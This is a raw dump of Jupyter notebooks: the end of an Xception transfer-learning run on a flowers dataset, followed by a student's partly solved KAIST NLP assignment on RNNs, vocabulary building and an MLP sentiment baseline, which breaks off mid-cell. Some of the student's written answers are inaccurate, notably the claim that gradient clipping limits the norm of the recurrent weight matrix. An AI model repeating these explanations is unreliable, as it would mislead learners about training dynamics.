"Epoch 1/5\n92/92 [==============================] - 36s 388ms/step - loss: 0.9322 - accuracy: 0.6570 - val_loss: 137.3918 - val_accuracy: 0.1676\nEpoch 2/5\n92/92 [==============================] - 35s 379ms/step - loss: 0.6798 - accuracy: 0.7681 - val_loss: 6.4545 - val_accuracy: 0.4441\nEpoch 3/5\n92/92 [==============================] - 35s 378ms/step - loss: 0.4244 - accuracy: 0.8556 - val_loss: 0.5848 - val_accuracy: 0.8065\nEpoch 4/5\n92/92 [==============================] - 35s 378ms/step - loss: 0.2895 - accuracy: 0.9087 - val_loss: 0.5933 - val_accuracy: 0.8256\nEpoch 5/5\n92/92 [==============================] - 35s 378ms/step - loss: 0.1671 - accuracy: 0.9418 - val_loss: 0.3851 - val_accuracy: 0.8815\n"
]
],
[
[
"",
"_____no_output_____"
]
],
[
[
"# to finetune the model, we have to set more layers to trainable\n# and reduce the learning rate drastically to prevent\n# destroying of weights\nfor layer in base_model.layers:\n layer.trainable = True",
"_____no_output_____"
],
[
"# reduce the learning rate to not damage the pretrained weights\n# model will need longer to train because all the layers are trainable\nmodel.compile(\n optimizer=tf.keras.optimizers.SGD(lr=0.01, momentum=0.9, decay=0.001),\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy']\n)\nhistory_finetune=model.fit(\n train_data,\n epochs=10,\n validation_data=test_data\n)",
"Epoch 1/10\n92/92 [==============================] - 36s 387ms/step - loss: 0.1017 - accuracy: 0.9721 - val_loss: 0.2701 - val_accuracy: 0.9074\nEpoch 2/10\n92/92 [==============================] - 35s 378ms/step - loss: 0.0685 - accuracy: 0.9775 - val_loss: 0.2804 - val_accuracy: 0.9087\nEpoch 3/10\n92/92 [==============================] - 35s 378ms/step - loss: 0.0692 - accuracy: 0.9802 - val_loss: 0.2713 - val_accuracy: 0.9237\nEpoch 4/10\n92/92 [==============================] - 35s 379ms/step - loss: 0.0410 - accuracy: 0.9871 - val_loss: 0.2789 - val_accuracy: 0.9155\nEpoch 5/10\n92/92 [==============================] - 35s 378ms/step - loss: 0.0388 - accuracy: 0.9901 - val_loss: 0.2774 - val_accuracy: 0.9183\nEpoch 6/10\n92/92 [==============================] - 35s 379ms/step - loss: 0.0281 - accuracy: 0.9928 - val_loss: 0.2995 - val_accuracy: 0.9128\nEpoch 7/10\n92/92 [==============================] - 35s 379ms/step - loss: 0.0231 - accuracy: 0.9932 - val_loss: 0.3086 - val_accuracy: 0.9196\nEpoch 8/10\n92/92 [==============================] - 35s 378ms/step - loss: 0.0258 - accuracy: 0.9918 - val_loss: 0.3124 - val_accuracy: 0.9210\nEpoch 9/10\n92/92 [==============================] - 35s 378ms/step - loss: 0.0259 - accuracy: 0.9922 - val_loss: 0.3130 - val_accuracy: 0.9183\nEpoch 10/10\n92/92 [==============================] - 35s 378ms/step - loss: 0.0157 - accuracy: 0.9956 - val_loss: 0.3218 - val_accuracy: 0.9183\n"
]
],
[
[
"## Visualization and Evaluation",
"_____no_output_____"
]
],
[
[
"# add the two histories and print the diagram\nhelpers.plot_two_histories(history, history_finetune)",
"_____no_output_____"
]
],
[
[
"# Transfer Learning with Data Augmentation\n## Model Definition",
"_____no_output_____"
]
],
[
[
"from tensorflow.keras.applications.xception import Xception\nfrom tensorflow.keras.layers import GlobalAveragePooling2D\n\n# build a transfer learning model with Xception and a new Fully-Connected-Classifier\nbase_model_data_augmentation = Xception(\n weights='imagenet',\n include_top=False\n)\nmodel = GlobalAveragePooling2D()(base_model_data_augmentation.output)\nmodel = Dropout(0.5)(model)\n\n# include new Fully-Connected-Classifier\noutput_layer = Dense(n_classes, activation='softmax')(model)\n\n# create Model\ndata_augmentation_model = Model(base_model_data_augmentation.input, output_layer)",
"_____no_output_____"
]
],
[
[
"## Adjust Data Augmentation",
"_____no_output_____"
]
],
[
[
"# resize the images to a uniform size\ndef preprocess_with_data_augmentation(image, label):\n resized_image = tf.image.resize(image, [224, 224])\n\n # data augmentation with Tensorflow\n augmented_image = tf.image.random_flip_left_right(resized_image)\n augmented_image = tf.image.random_hue(augmented_image, 0.08)\n augmented_image = tf.image.random_saturation(augmented_image, 0.6, 1.6)\n augmented_image = tf.image.random_brightness(augmented_image, 0.05)\n augmented_image = tf.image.random_contrast(augmented_image, 0.7, 1.3)\n\n # run Xceptions preprocessing function\n preprocessed_image = tf.keras.applications.xception.preprocess_input(augmented_image)\n return preprocessed_image, label",
"_____no_output_____"
],
[
"batch_size = 32\ntry:\n train_data = tfds.load('tf_flowers', split=\"train[:80%]\", as_supervised=True)\nexcept(Exception):\n # split the data into train and test data with a 8:2 ratio\n train_split, test_split = tfds.Split.TRAIN.subsplit([8, 2])\n train_data = tfds.load('tf_flowers', split=train_split, as_supervised=True) \naugmented_train_data = train_data.map(preprocess_with_data_augmentation).batch(batch_size).prefetch(1)",
"_____no_output_____"
]
],
[
[
"## Training",
"_____no_output_____"
]
],
[
[
"# set the pretrained layers to not trainable because\n# there are already trained and we don't want to destroy\n# their weights\nfor layer in base_model_data_augmentation.layers:\n layer.trainable = False\ndata_augmentation_model.compile(\n optimizer=tf.keras.optimizers.SGD(lr=0.2, momentum=0.9, decay=0.01),\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy']\n)\nhistory_data_augmentation = data_augmentation_model.fit(\n augmented_train_data,\n epochs=3,\n validation_data=test_data\n)",
"Epoch 1/3\n92/92 [==============================] - 13s 137ms/step - loss: 2.4155 - accuracy: 0.7520 - val_loss: 0.7927 - val_accuracy: 0.8828\nEpoch 2/3\n92/92 [==============================] - 12s 128ms/step - loss: 1.6251 - accuracy: 0.8270 - val_loss: 0.9737 - val_accuracy: 0.8760\nEpoch 3/3\n92/92 [==============================] - 12s 129ms/step - loss: 1.3145 - accuracy: 0.8450 - val_loss: 0.5669 - val_accuracy: 0.8992\n"
]
],
[
[
"## Finetuning",
"_____no_output_____"
]
],
[
[
"# to finetune the model, we have to set more layers to trainable\n# and reduce the learning rate drastically to prevent\n# destroying of weights\nfor layer in base_model_data_augmentation.layers:\n layer.trainable = True\n # reduce the learning rate to not damage the pretrained weights\n# model will need longer to train because all the layers are trainable\ndata_augmentation_model.compile(\n optimizer=tf.keras.optimizers.SGD(lr=0.01, momentum=0.9, decay=0.001),\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy']\n)\nhistory_finetune_data_augmentation = data_augmentation_model.fit(\n augmented_train_data,\n epochs=30,\n validation_data=test_data\n)",
"Epoch 1/30\n92/92 [==============================] - 36s 387ms/step - loss: 0.6197 - accuracy: 0.8205 - val_loss: 0.4202 - val_accuracy: 0.8924\nEpoch 2/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.1853 - accuracy: 0.9387 - val_loss: 0.2191 - val_accuracy: 0.9264\nEpoch 3/30\n92/92 [==============================] - 35s 378ms/step - loss: 0.0745 - accuracy: 0.9762 - val_loss: 0.2350 - val_accuracy: 0.9414\nEpoch 4/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0346 - accuracy: 0.9877 - val_loss: 0.2229 - val_accuracy: 0.9469\nEpoch 5/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0395 - accuracy: 0.9864 - val_loss: 0.3124 - val_accuracy: 0.9387\nEpoch 6/30\n92/92 [==============================] - 35s 378ms/step - loss: 0.0151 - accuracy: 0.9942 - val_loss: 0.3101 - val_accuracy: 0.9428\nEpoch 7/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0153 - accuracy: 0.9949 - val_loss: 0.2850 - val_accuracy: 0.9496\nEpoch 8/30\n92/92 [==============================] - 35s 378ms/step - loss: 0.0052 - accuracy: 0.9986 - val_loss: 0.2785 - val_accuracy: 0.9510\nEpoch 9/30\n92/92 [==============================] - 35s 378ms/step - loss: 0.0042 - accuracy: 0.9986 - val_loss: 0.2765 - val_accuracy: 0.9550\nEpoch 10/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0037 - accuracy: 0.9983 - val_loss: 0.3254 - val_accuracy: 0.9523\nEpoch 11/30\n92/92 [==============================] - 35s 378ms/step - loss: 0.0101 - accuracy: 0.9966 - val_loss: 0.3134 - val_accuracy: 0.9510\nEpoch 12/30\n92/92 [==============================] - 35s 378ms/step - loss: 0.0048 - accuracy: 0.9980 - val_loss: 0.2923 - val_accuracy: 0.9482\nEpoch 13/30\n92/92 [==============================] - 35s 378ms/step - loss: 0.0025 - accuracy: 0.9990 - val_loss: 0.3210 - val_accuracy: 0.9469\nEpoch 14/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0020 - accuracy: 0.9993 - val_loss: 0.3058 - val_accuracy: 0.9482\nEpoch 15/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0081 - accuracy: 0.9980 - val_loss: 0.3082 - val_accuracy: 0.9578\nEpoch 16/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0017 - accuracy: 0.9997 - val_loss: 0.2838 - val_accuracy: 0.9578\nEpoch 17/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0025 - accuracy: 0.9990 - val_loss: 0.2950 - val_accuracy: 0.9578\nEpoch 18/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0014 - accuracy: 0.9997 - val_loss: 0.2978 - val_accuracy: 0.9564\nEpoch 19/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0014 - accuracy: 0.9993 - val_loss: 0.2846 - val_accuracy: 0.9591\nEpoch 20/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0034 - accuracy: 0.9986 - val_loss: 0.3410 - val_accuracy: 0.9496\nEpoch 21/30\n92/92 [==============================] - 35s 378ms/step - loss: 7.8189e-04 - accuracy: 1.0000 - val_loss: 0.3331 - val_accuracy: 0.9510\nEpoch 22/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0014 - accuracy: 0.9997 - val_loss: 0.3307 - val_accuracy: 0.9510\nEpoch 23/30\n92/92 [==============================] - 35s 379ms/step - loss: 3.4142e-04 - accuracy: 1.0000 - val_loss: 0.3373 - val_accuracy: 0.9537\nEpoch 24/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0014 - accuracy: 0.9997 - val_loss: 0.3572 - val_accuracy: 0.9537\nEpoch 25/30\n92/92 
[==============================] - 35s 378ms/step - loss: 0.0028 - accuracy: 0.9990 - val_loss: 0.3347 - val_accuracy: 0.9523\nEpoch 26/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0018 - accuracy: 0.9997 - val_loss: 0.3831 - val_accuracy: 0.9510\nEpoch 27/30\n92/92 [==============================] - 35s 379ms/step - loss: 8.8465e-04 - accuracy: 0.9997 - val_loss: 0.3714 - val_accuracy: 0.9523\nEpoch 28/30\n92/92 [==============================] - 35s 379ms/step - loss: 3.8871e-04 - accuracy: 1.0000 - val_loss: 0.3722 - val_accuracy: 0.9510\nEpoch 29/30\n92/92 [==============================] - 35s 379ms/step - loss: 6.5433e-04 - accuracy: 0.9997 - val_loss: 0.3691 - val_accuracy: 0.9550\nEpoch 30/30\n92/92 [==============================] - 35s 379ms/step - loss: 8.1220e-04 - accuracy: 0.9997 - val_loss: 0.3629 - val_accuracy: 0.9537\n"
]
],
[
[
"## Visualization",
"_____no_output_____"
]
],
[
[
"# add the two histories and print the diagram\nhelpers.plot_two_histories(history_data_augmentation, history_finetune_data_augmentation)",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb2a7732cd51cea7316cca50e11895e39b1cfa3b | 147,399 | ipynb | Jupyter Notebook | AI605/KAIST_AI605_Assignment_1.ipynb | sungnyun/AI-assignments | 6451fd6db33fd8671ca362b4ad4c190979a98c22 | [
"MIT"
] | null | null | null | AI605/KAIST_AI605_Assignment_1.ipynb | sungnyun/AI-assignments | 6451fd6db33fd8671ca362b4ad4c190979a98c22 | [
"MIT"
] | null | null | null | AI605/KAIST_AI605_Assignment_1.ipynb | sungnyun/AI-assignments | 6451fd6db33fd8671ca362b4ad4c190979a98c22 | [
"MIT"
] | null | null | null | 33.830388 | 496 | 0.583532 | [
[
[
"# KAIST AI605 Assignment 1: Text Classification\nTA in charge: Miyoung Ko ([email protected])\n\n**Due Date:** September 29 (Wed) 11:00pm, 2021\n\n## Your Submission\nIf you are a KAIST student, you will submit your assignment via [KLMS](https://klms.kaist.ac.kr). If you are a NAVER student, you will submit via [Google Form](https://forms.gle/aGZZ86YpCdv2zEVt9). \n\nYou need to submit both (1) a PDF of this notebook, and (2) a link to CoLab for execution (.ipynb file is also allowed).\n\nUse in-line LaTeX (see below) for mathematical expressions. Collaboration among students is allowed but it is not a group assignment so make sure your answer and code are your own. Make sure to mention your collaborators in your assignment with their names and their student ids.\n\n## Grading\nThe entire assignment is out of 20 points. You can obtain up to 5 bonus points (i.e. max score is 25 points). For every late day, your grade will be deducted by 2 points (KAIST students only). You can use one of your no-penalty late days (7 days in total). Make sure to mention this in your submission. You will receive a grade of zero if you submit after 7 days.\n\n\n## Environment\nYou will only use Python 3.7 and PyTorch 1.9, which is already available on Colab:",
"_____no_output_____"
]
],
[
[
"from platform import python_version\nimport torch\n\nprint(\"python\", python_version())\nprint(\"torch\", torch.__version__)",
"python 3.8.3\ntorch 1.7.0\n"
]
],
[
[
"## 1. Limitations of Vanilla RNNs\nIn Lecture 02, we saw that a multi-layer perceptron (MLP) without activation function is equivalent to a single linear transformation with respect to the inputs. One can define a vanilla recurrent neural network without activation as, given inputs $\\textbf{x}_1 \\dots \\textbf{x}_T$, the outputs $\\textbf{h}_t$ is obtained by\n$$\\textbf{h}_t = \\textbf{V}\\textbf{h}_{t-1} + \\textbf{U}\\textbf{x}_t + \\textbf{b},$$\nwhere $\\textbf{V}, \\textbf{U}, \\textbf{b}$ are trainable weights. \n\n> **Problem 1.1** *(2 point)* Show that such recurrent neural network (RNN) without activation function is equivalent to a single linear transformation with respect to the inputs, which means each $\\textbf{h}_t$ is a linear combination of the inputs.\n\n\n\nIn Lecture 05 and 06, we will see how RNNs can model non-linearity via activation function, but they still suffer from exploding or vanishing gradients. We can mathematically show that, if the recurrent relation is\n$$ \\textbf{h}_t = \\sigma (\\textbf{V}\\textbf{h}_{t-1} + \\textbf{U}\\textbf{x}_t + \\textbf{b}) $$\nthen\n$$ \\frac{\\partial \\textbf{h}_t}{\\partial \\textbf{h}_{t-1}} = \\text{diag}(\\sigma' (\\textbf{V}\\textbf{h}_{t-1} + \\textbf{U}\\textbf{x}_t + \\textbf{b}))\\textbf{V}$$\nso\n$$\\frac{\\partial \\textbf{h}_T}{\\partial \\textbf{h}_1} \\propto \\textbf{V}^{T-1}$$\nwhich means this term will be very close to zero if the norm of $\\bf{V}$ is smaller than 1 and really big otherwise.\n\n> **Problem 1.2** *(2 points)* Explain how exploding gradient can be mitigated if we use gradient clipping.\n\n> **Problem 1.3** *(2 points)* Explain how vanishing gradient can be mitigated if we use LSTM. See the Lecture 05 and 06 slides for the definition of LSTM.",
"_____no_output_____"
],
[
"## (Answer)\n\n**Problem 1.1.**\nFor every $t$, $\\mathbf{h}_t$ is recursively defined as\n$$ \\mathbf{h}_t = \\mathbf{V}\\mathbf{h}_{t-1} + \\mathbf{U}\\mathbf{x}_t + \\mathbf{b} = \\mathbf{V}(\\mathbf{V}\\mathbf{h}_{t-2} + \\mathbf{U}\\mathbf{x}_{t-1} + \\mathbf{b}) + \\mathbf{U}\\mathbf{x}_t + \\mathbf{b}$$\n$$ =\\cdots = \\mathbf{V}^t\\mathbf{h}_0 + \\sum_{k=0}^{t-1} \\mathbf{V}^{k}\\mathbf{U}\\mathbf{x}_{t-k} + \\sum_{k=0}^{t-1} \\mathbf{V}^k \\mathbf{b} $$\nwhich is a linear combination of the inputs $\\mathbf{x}_1,\\mathbf{x}_2,\\cdots,\\mathbf{x}_t$. This holds for every $t$, therefore RNN without non-linear activation function is equiavlent to a single linear transformation of the inputs.\n\n**Problem 1.2.**\nIf we use gradient clipping, the norm of $\\mathbf{V}$ does not exceed some value, i.e., 1. Then, the gradient $\\frac{\\partial\\mathbf{h}_T}{\\partial\\mathbf{h}_1}$ can be reduced, mitigating the exploding gradient issue.\n\n**Problem 1.3.**\nIn LSTM, activation function helps avoiding vanishing gradient. In the recurrency of the LSTM, the activation function is the identity function with a derivative of 1.0. Specifically, the effective weight of the recurrency is equal to the forget gate activation. So, if the forget gate is on (activation close to 1.0), the gradient does not vanish. ",
"_____no_output_____"
],
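[
"To make the gradient clipping idea from Problem 1.2 concrete, here is a minimal illustrative sketch added to this write-up (not part of the graded answer). It uses PyTorch's built-in `nn.RNN` purely for illustration, and the clipping threshold `max_norm=1.0` is an assumed value.",
"_____no_output_____"
],
[
"# Illustrative sketch of gradient clipping (assumed threshold max_norm=1.0)\nimport torch\nfrom torch import nn\n\nrnn = nn.RNN(input_size=8, hidden_size=16, batch_first=True)\noptimizer = torch.optim.SGD(rnn.parameters(), lr=0.1)\n\nx = torch.randn(4, 20, 8)    # (batch, time, features)\noutput, h_n = rnn(x)\nloss = output.pow(2).mean()  # dummy loss, just to produce gradients\n\noptimizer.zero_grad()\nloss.backward()\n# rescale all gradients so that their global norm does not exceed 1.0\nnn.utils.clip_grad_norm_(rnn.parameters(), max_norm=1.0)\noptimizer.step()",
"_____no_output_____"
],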
[
"## 2. Creating Vocabulary from Training Data\nCreating the vocabulary is the first step for every natural language processing model. In this section, you will use Stanford Sentiment Treebank (SST), a popular dataset for sentiment classification, to create your vocabulary.\n\n### Obtaining SST via Hugging Face\nWe will use `datasets` package offered by Hugging Face, which allows us to easily download various language datasets, including Stanford Sentiment Treebank.\n\nFirst, install the package:",
"_____no_output_____"
]
],
[
[
"!pip install datasets",
"Collecting datasets\n Downloading datasets-1.12.1-py3-none-any.whl (270 kB)\n\u001b[K |████████████████████████████████| 270 kB 12.2 MB/s \n\u001b[?25hRequirement already satisfied: multiprocess in /usr/local/lib/python3.7/dist-packages (from datasets) (0.70.12.2)\nRequirement already satisfied: pyarrow!=4.0.0,>=1.0.0 in /usr/local/lib/python3.7/dist-packages (from datasets) (3.0.0)\nRequirement already satisfied: tqdm>=4.62.1 in /usr/local/lib/python3.7/dist-packages (from datasets) (4.62.2)\nRequirement already satisfied: pandas in /usr/local/lib/python3.7/dist-packages (from datasets) (1.1.5)\nCollecting huggingface-hub<0.1.0,>=0.0.14\n Downloading huggingface_hub-0.0.17-py3-none-any.whl (52 kB)\n\u001b[K |████████████████████████████████| 52 kB 1.6 MB/s \n\u001b[?25hRequirement already satisfied: packaging in /usr/local/lib/python3.7/dist-packages (from datasets) (21.0)\nRequirement already satisfied: requests>=2.19.0 in /usr/local/lib/python3.7/dist-packages (from datasets) (2.23.0)\nRequirement already satisfied: numpy>=1.17 in /usr/local/lib/python3.7/dist-packages (from datasets) (1.19.5)\nCollecting xxhash\n Downloading xxhash-2.0.2-cp37-cp37m-manylinux2010_x86_64.whl (243 kB)\n\u001b[K |████████████████████████████████| 243 kB 41.0 MB/s \n\u001b[?25hRequirement already satisfied: importlib-metadata in /usr/local/lib/python3.7/dist-packages (from datasets) (4.8.1)\nRequirement already satisfied: dill in /usr/local/lib/python3.7/dist-packages (from datasets) (0.3.4)\nCollecting aiohttp\n Downloading aiohttp-3.7.4.post0-cp37-cp37m-manylinux2014_x86_64.whl (1.3 MB)\n\u001b[K |████████████████████████████████| 1.3 MB 46.5 MB/s \n\u001b[?25hCollecting fsspec[http]>=2021.05.0\n Downloading fsspec-2021.9.0-py3-none-any.whl (123 kB)\n\u001b[K |████████████████████████████████| 123 kB 52.2 MB/s \n\u001b[?25hRequirement already satisfied: filelock in /usr/local/lib/python3.7/dist-packages (from huggingface-hub<0.1.0,>=0.0.14->datasets) (3.0.12)\nRequirement already satisfied: typing-extensions in /usr/local/lib/python3.7/dist-packages (from huggingface-hub<0.1.0,>=0.0.14->datasets) (3.7.4.3)\nRequirement already satisfied: pyparsing>=2.0.2 in /usr/local/lib/python3.7/dist-packages (from packaging->datasets) (2.4.7)\nRequirement already satisfied: chardet<4,>=3.0.2 in /usr/local/lib/python3.7/dist-packages (from requests>=2.19.0->datasets) (3.0.4)\nRequirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.7/dist-packages (from requests>=2.19.0->datasets) (2021.5.30)\nRequirement already satisfied: urllib3!=1.25.0,!=1.25.1,<1.26,>=1.21.1 in /usr/local/lib/python3.7/dist-packages (from requests>=2.19.0->datasets) (1.24.3)\nRequirement already satisfied: idna<3,>=2.5 in /usr/local/lib/python3.7/dist-packages (from requests>=2.19.0->datasets) (2.10)\nCollecting yarl<2.0,>=1.0\n Downloading yarl-1.6.3-cp37-cp37m-manylinux2014_x86_64.whl (294 kB)\n\u001b[K |████████████████████████████████| 294 kB 49.8 MB/s \n\u001b[?25hCollecting async-timeout<4.0,>=3.0\n Downloading async_timeout-3.0.1-py3-none-any.whl (8.2 kB)\nRequirement already satisfied: attrs>=17.3.0 in /usr/local/lib/python3.7/dist-packages (from aiohttp->datasets) (21.2.0)\nCollecting multidict<7.0,>=4.5\n Downloading multidict-5.1.0-cp37-cp37m-manylinux2014_x86_64.whl (142 kB)\n\u001b[K |████████████████████████████████| 142 kB 52.5 MB/s \n\u001b[?25hRequirement already satisfied: zipp>=0.5 in /usr/local/lib/python3.7/dist-packages (from importlib-metadata->datasets) (3.5.0)\nRequirement already satisfied: 
pytz>=2017.2 in /usr/local/lib/python3.7/dist-packages (from pandas->datasets) (2018.9)\nRequirement already satisfied: python-dateutil>=2.7.3 in /usr/local/lib/python3.7/dist-packages (from pandas->datasets) (2.8.2)\nRequirement already satisfied: six>=1.5 in /usr/local/lib/python3.7/dist-packages (from python-dateutil>=2.7.3->pandas->datasets) (1.15.0)\nInstalling collected packages: multidict, yarl, async-timeout, fsspec, aiohttp, xxhash, huggingface-hub, datasets\nSuccessfully installed aiohttp-3.7.4.post0 async-timeout-3.0.1 datasets-1.12.1 fsspec-2021.9.0 huggingface-hub-0.0.17 multidict-5.1.0 xxhash-2.0.2 yarl-1.6.3\n"
]
],
[
[
"Then download SST and print the first example:",
"_____no_output_____"
]
],
[
[
"from datasets import load_dataset\nfrom pprint import pprint\n\nsst_dataset = load_dataset('sst')\npprint(sst_dataset['train'][0])",
"No config specified, defaulting to: sst/default\nReusing dataset sst (/home/sungnyun/.cache/huggingface/datasets/sst/default/1.0.0/b8a7889ef01c5d3ae8c379b84cc4080f8aad3ac2bc538701cbe0ac6416fb76ff)\n"
]
],
[
[
"Note that each `label` is a score between 0 and 1. You will round it to either 0 or 1 for binary classification (positive for 1, negative for 0).\nIn this first example, the label is rounded to 1, meaning that the sentence is a positive review.\nYou will only use `sentence` as the input; please ignore other values.",
"_____no_output_____"
],
[
"> **Problem 2.1** *(2 points)* Using space tokenizer, create the vocabulary for the training data and report the vocabulary size here. Make sure that you add an `UNK` token to the vocabulary to account for words (during inference time) that you haven't seen. See below for an example with a short text.",
"_____no_output_____"
],
[
"## (Answer)\n**Problem 2.1.**\nVocabulary size is 18282, including 'PAD' and 'UNK' token. (see the code below)",
"_____no_output_____"
]
],
[
[
"# Space tokenization\ntext = \"Hello world!\"\ntokens = text.split(' ')\nprint(tokens)",
"['Hello', 'world!']\n"
],
[
"# Constructing vocabulary with `UNK`\nvocab = ['PAD', 'UNK'] + list(set(text.split(' ')))\nword2id = {word: id_ for id_, word in enumerate(vocab)}\nprint(vocab)\nprint(word2id['Hello'])",
"['PAD', 'UNK', 'Hello', 'world!']\n2\n"
],
[
"### Problem 2.1 ###\nvocab = ['PAD', 'UNK']\nfor data in sst_dataset['train']:\n for word in data['sentence'].split(' '):\n if word not in vocab:\n vocab.append(word)\nword2id = {word: id_ for id_, word in enumerate(vocab)}\n\nprint('Vocabulary size: {}'.format(len(vocab)))",
"Vocabulary size: 18282\n"
]
],
[
[
"> **Problem 2.2** *(1 point)* Using all words in the training data will make the vocabulary very big. Reduce its size by only including words that occur at least 2 times. How does the size of the vocabulary change?",
"_____no_output_____"
],
[
"## (Answer)\n**Problem 2.2.**\nVocabulary size is now 8738, including 'PAD' and 'UNK' token. (see the code below)",
"_____no_output_____"
]
],
[
[
"### Problem 2.2 ###\nvocab = ['PAD', 'UNK']\nvocab_count = {}\nfor data in sst_dataset['train']:\n for word in data['sentence'].split(' '):\n if word not in vocab and word not in vocab_count.keys():\n vocab_count[word] = 1\n elif word not in vocab and word in vocab_count.keys():\n vocab_count[word] += 1\n if vocab_count[word] >= 2:\n vocab.append(word)\n else:\n continue\nword2id = {word: id_ for id_, word in enumerate(vocab)}\n\nprint('Vocabulary size: {}'.format(len(vocab)))",
"Vocabulary size: 8738\n"
]
],
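[
[
"An equivalent, more compact way to build the thresholded vocabulary, added here as an illustration (not part of the submitted answer). The resulting set of words should match the loop above, although the insertion order may differ.",
"_____no_output_____"
],
[
"# Alternative sketch: build the min-count-2 vocabulary with collections.Counter\nfrom collections import Counter\n\ncounts = Counter(word for data in sst_dataset['train'] for word in data['sentence'].split(' '))\nvocab_alt = ['PAD', 'UNK'] + [word for word, count in counts.items() if count >= 2]\nword2id_alt = {word: id_ for id_, word in enumerate(vocab_alt)}\nprint('Vocabulary size:', len(vocab_alt))",
"_____no_output_____"
]
],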
[
[
"## 3. Text Classification with Multi-Layer Perceptron and Recurrent Neural Network\n\nYou can now use the vocabulary constructed from the training data to create an embedding matrix. You will use the embedding matrix to map each input sequence of tokens to a list of embedding vectors. One of the simplest baseline is to fix the input length (with truncation or padding), flatten the word embeddings, apply a linear transformation followed by an activation, and finally classify the output into the two classes: ",
"_____no_output_____"
]
],
[
[
"from torch import nn\n\nlength = 8\ninput_ = \"hi world!\"\ninput_tokens = input_.split(' ')\ninput_ids = [word2id[word] if word in word2id else 1 for word in input_tokens] # UNK if word not found\nif len(input_ids) < length:\n input_ids = input_ids + [0] * (length - len(input_ids)) # PAD tokens at the end\nelse:\n input_ids = input_ids[:length]\n\ninput_tensor = torch.LongTensor([input_ids]) # the first dimension is minibatch size\nprint(input_tensor)",
"tensor([[1, 1, 0, 0, 0, 0, 0, 0]])\n"
],
[
"# Two-layer MLP classification\nclass Baseline(nn.Module):\n def __init__(self, d, length):\n super(Baseline, self).__init__()\n self.embedding = nn.Embedding(len(vocab), d)\n self.layer = nn.Linear(d * length, d, bias=True)\n self.relu = nn.ReLU()\n self.class_layer = nn.Linear(d, 2, bias=True)\n\n def forward(self, input_tensor):\n emb = self.embedding(input_tensor) # [batch_size, length, d]\n emb_flat = emb.view(emb.size(0), -1) # [batch_size, length*d]\n hidden = self.relu(self.layer(emb_flat))\n logits = self.class_layer(hidden)\n return logits\n\nd = 3 # usually bigger, e.g. 128\nbaseline = Baseline(d, length).cuda()\nlogits = baseline(input_tensor.cuda())\nsoftmax = nn.Softmax(1)\nprint(softmax(logits)) # probability for each class",
"tensor([[0.1654, 0.8346]], device='cuda:0', grad_fn=<SoftmaxBackward>)\n"
]
],
[
[
"Now we will compute the loss, which is the negative log probability of the input text's label being the target label (`1`), which in fact turns out to be equivalent to the cross entropy (https://en.wikipedia.org/wiki/Cross_entropy) between the probability distribution and a one-hot distribution of the target label (note that we use `logits` instead of `softmax(logits)` as the input to the cross entropy, which allow us to avoid numerical instability). ",
"_____no_output_____"
]
],
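[
[
"As a small numerical check added to this write-up (not in the original assignment), we can verify that `CrossEntropyLoss` applied to logits equals the negative log of the softmax probability assigned to the target class.",
"_____no_output_____"
],
[
"# Check: cross entropy on logits == negative log-probability of the target class\nimport torch\nfrom torch import nn\n\nexample_logits = torch.tensor([[0.2, 1.5]])   # one example, two classes\nexample_target = torch.tensor([1])\n\nce = nn.CrossEntropyLoss()(example_logits, example_target)\nlog_probs = torch.log_softmax(example_logits, dim=1)\nnll = -log_probs[0, example_target.item()]\nprint(ce.item(), nll.item())   # the two numbers match",
"_____no_output_____"
]
],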
[
[
"cel = nn.CrossEntropyLoss()\nlabel = torch.LongTensor([1]).cuda() # The ground truth label for \"hi world!\" is positive.\nloss = cel(logits, label) # Loss, a.k.a L\nprint(loss)",
"tensor(0.1809, device='cuda:0', grad_fn=<NllLossBackward>)\n"
]
],
[
[
"Once we have the loss defined, only one step remains! We compute the gradients of parameters with respective to the loss and update. Fortunately, PyTorch does this for us in a very convenient way. Note that we used only one example to update the model, which is basically a Stochastic Gradient Descent (SGD) with minibatch size of 1. A recommended minibatch size in this exercise is at least 16. It is also recommended that you reuse your training data at least 10 times (i.e. 10 *epochs*).",
"_____no_output_____"
]
],
[
[
"optimizer = torch.optim.SGD(baseline.parameters(), lr=0.1)\noptimizer.zero_grad() # reset process\nloss.backward() # compute gradients\noptimizer.step() # update parameters",
"_____no_output_____"
]
],
[
[
"Once you have done this, all weight parameters will have `grad` attributes that contain their gradients with respect to the loss.",
"_____no_output_____"
]
],
[
[
"print(baseline.layer.weight.grad) # dL/dw of weights in the linear layer",
